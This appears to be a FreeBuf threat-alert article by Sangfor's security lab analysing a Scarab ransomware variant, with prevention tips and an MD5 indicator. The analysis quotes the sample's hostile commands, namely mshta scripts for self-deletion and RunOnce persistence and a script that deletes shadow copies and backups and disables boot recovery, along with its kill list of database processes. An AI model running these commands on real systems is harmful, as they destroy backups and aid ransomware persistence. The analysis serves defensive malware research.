freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

威胁预警 | Scarab勒索病毒变种来袭
深信服千里目安全技术中心 2018-06-17 12:32:20 587888

*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。

一、事件背景

最近接到应急响应客户被勒索病毒攻击,深信服EDR安全团队捕获到相应的恶意样本,经分析确认此样本为Scarab勒索病毒变种样本。

Scarab勒索病毒是利用Necurs僵尸网络进行传播,Necurs是世界上最大的僵尸网络之一,曾用于传播多个恶意家族样本,最新变种主要通过RDP爆破+人工植入的方式传播感染主机。

爆破的相关日志,如下:

图片.png

二、样本分析

(1)样本通过GetKeyboardType获取当前用户键盘类型,如下:

图片.png

(2)进行一连串的字符串解密操作,得到程序的一些加密配置信息等,如下:

图片.png

(3)打开注册表项HKEY_CURRENT_USER\Software\ILRTISo,如下:

图片.png

查询idle注册表项,是否设置,如下:

图片.png

(4)拷贝自身到%APPDATA%\Roaming目录下,并重命名为sevnz.exe,如下:

图片.png

通过CreateProcess调用cmd.exe命名执行:

/c copy /y [Virus文件名路径] %APPDATA%\sevnz.exe,如下:

图片.png

病毒母体拷贝自身到%APPDATA%目录下sevnz.exe,如下:

图片.png

(5)查询%APPDATA%目录下是否存在sevnz.exe程序,如下:

图片.png

然后自己传入参数“runas”,并调用ShellExecuteW生成一个新的进程,如下:

图片.png

(6)执行%APPDATA%目录下的sevnz.exe程序,如下:

图片.png

(7)sevnz.exe通过CreateProcess调用cmd.exe命名执行:

mshta.exe javascript:o=newActiveXObject(‘Scripting.FileSystemObject’);setInterval(function(){try{o.DeleteFile(‘[FileName.exe]’);close()}catch(e){}},10);

删除母体文件,动态调试,如下:

图片.png

(8)母体样本通过删除sevnz.exe,来判断之前的sevnz.exe是否启动,如下:

图片.png

如果程序已启动,删除会失败,如下:

图片.png

(9)当sevnz.exe在运行之中时,调用JavaScript脚本,将此进程添加到注册表的auto-run,相应的脚本命令:

mshta.exe“javascript:o=new ActiveXObject(‘WScript.Shell’);

x=newActiveXObject(‘Scripting.FileSystemObject’);

setInterval(function(){try{i=x.GetFile(‘sevnz.exe’).Path;

o.RegWrite(‘HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\ILRTISo’,i);}

catch(e){}},10);

动态调试跟踪,如下:

图片.png

自启动项创建完成之后,如下:

图片.png

(10)创建加密线程,执行勒索病毒的主要加密流程,如下:

图片.png

(11)通过JavaScript脚本读取注册表项HKEY_CURRENT_USER\Software\JBGUJ中的键值,然后执行里面的命令,如下:

图片.png

注册表项中相关的命令脚本如下:

o=new ActiveXObject("WScript.Shell");

o.Run("cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0",0);

o.Run("cmd.exe /c wmic SHADOWCOPY DELETE",0);

o.Run("cmd.exe /c vssadmin Delete Shadows /All /Quiet",0);

o.Run("cmd.exe /c bcdedit /set {default} recoveryenabled No",0);

o.Run("cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures",0);

通过上面的脚本命令,删除磁盘卷影文件,防止用户恢复文件

(12)启动线程,执行加密流程,如下:

图片.png

(13)遍历主机进程列表,发现如下进程列表,则结束,相关的进程列表如下:

agntsvc.exe;isqlplussvc.exe;ncsvc.exe;msftesql.exe;sqlagent.exe;sqlbrowser.exe;sqlservr.exe;sqlserver.exe;sqlwriter.exe;oracle.exe;ocssd.exe;dbsnmp.exe;synctime.exe;mydesktopqos.exe;agntsvc.exeisqlplussvc.exe;xfssvccon.exe;mydesktopservice.exe;ocautoupds.exe;agntsvc.exeagntsvc.exe;agntsvc.exeencsvc.exe;firefoxconfig.exe;tbirdconfig.exe;ocomm.exe;mysqld.exe;mysqld-nt.exe;mysqld-opt.exe;dbeng50.exe;sqbcoreservice.exe;

动态调试,得到相关的进程列表如下:

图片.png

结束进程的代码如下:

图片.png

(14)加密文件的主函数过程代码,如下:

图片.png

图片.png

(15)删除HKEY_CURRENT_USER\Software\JBGUJ注册表项的内容,如下:

图片.png

(16)加密流程执行完成之后,原文件变为了scarab后缀的文件,如下:

图片.png

同时弹出相关的勒索信息,如下:

图片.png

三、预防措施

同时深信服EDR安全团队提醒用户:

1.不要点击来源不明的邮件以及附件

2.及时给电脑打补丁,修复漏洞

3.不从垃圾网站或不明网站下载软件

4.安装专业的终端/服务器安全防护软件

5.此勒索病毒变种主要通过RDP爆破的方式,建议用户及时修改密码

四、相关IOC

MD5

9A02862AC95345359DFC3DCC93E3C10E

* 本文作者:千里目安全实验室,转载注明来自FreeBuf.COM

# Scarab
本文为 深信服千里目安全技术中心 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
深信服千里目安全技术中心 LV.9
这家伙太懒了,还未填写个人描述!
  • 417 文章数
  • 611 关注者
【漏洞通告】Ivanti多产品缓冲区溢出漏洞(CVE-2025-22457)
2025-04-11
【漏洞通告】Vite 任意文件读取漏洞(CVE-2025-31486)
2025-04-09
【漏洞通告】微软补丁日安全通告|4月份
2025-04-09
文章目录